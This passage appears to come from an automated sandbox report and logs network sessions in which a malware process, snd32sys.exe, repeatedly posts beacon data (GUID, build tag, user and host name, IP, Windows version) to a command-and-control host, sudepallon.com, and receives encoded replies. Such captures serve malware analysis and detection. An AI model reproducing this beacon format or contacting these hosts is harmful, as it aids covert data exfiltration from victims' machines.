                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:03 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 43 41 5a 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cCAZXARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  24192.168.2.34977877.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:02.240464926 CEST6051OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:02.306262970 CEST6051INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:03 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 4b 41 5a 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cKAZPARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  25192.168.2.34977977.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:02.637330055 CEST6052OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:02.708657980 CEST6052INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:04 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 54 48 53 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cTHSGARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  26192.168.2.34978077.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:03.034343958 CEST6053OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:03.099986076 CEST6053INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:04 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 43 48 53 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cCHSXARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  27192.168.2.34978177.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:03.457827091 CEST6054OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:03.525928974 CEST6054INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:05 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 4e 4a 51 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cNJQMARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  28192.168.2.34978277.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:03.970303059 CEST6055OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:04.037123919 CEST6056INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:05 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 4d 54 47 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cMTGNARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  29192.168.2.34978377.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:04.411729097 CEST6056OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:04.479322910 CEST6057INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:05 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 5a 41 5a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cZAZAARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  3192.168.2.34975777.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:53.509896040 CEST5499OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:53.576370001 CEST5505INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:31:55 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 51 4b 50 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cQKPJARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  30192.168.2.34978477.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:04.784542084 CEST6057OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:04.851527929 CEST6058INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:06 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 4d 4b 50 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cMKPNARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  31192.168.2.34978577.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:05.179541111 CEST6059OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:05.246893883 CEST6059INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:06 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 43 4e 4d 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cCNMXARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  32192.168.2.34978677.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:05.567929029 CEST6060OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:05.634110928 CEST6060INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:07 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 42 4b 50 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cBKPYARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  33192.168.2.34978777.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:05.990741968 CEST6061OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:06.056196928 CEST6061INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:07 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 42 5a 41 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cBZAYARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  34192.168.2.34978877.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:06.570564985 CEST6062OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:06.643687010 CEST6062INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:08 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 51 4b 50 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cQKPJARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  35192.168.2.34978977.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:07.036962032 CEST6063OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:07.106313944 CEST6063INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:08 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 41 51 4a 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cAQJZARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  36192.168.2.34979077.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:07.823514938 CEST6064OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:07.890404940 CEST6065INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:09 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 4a 4d 4e 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cJMNQARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  37192.168.2.34979177.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:08.232155085 CEST6065OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
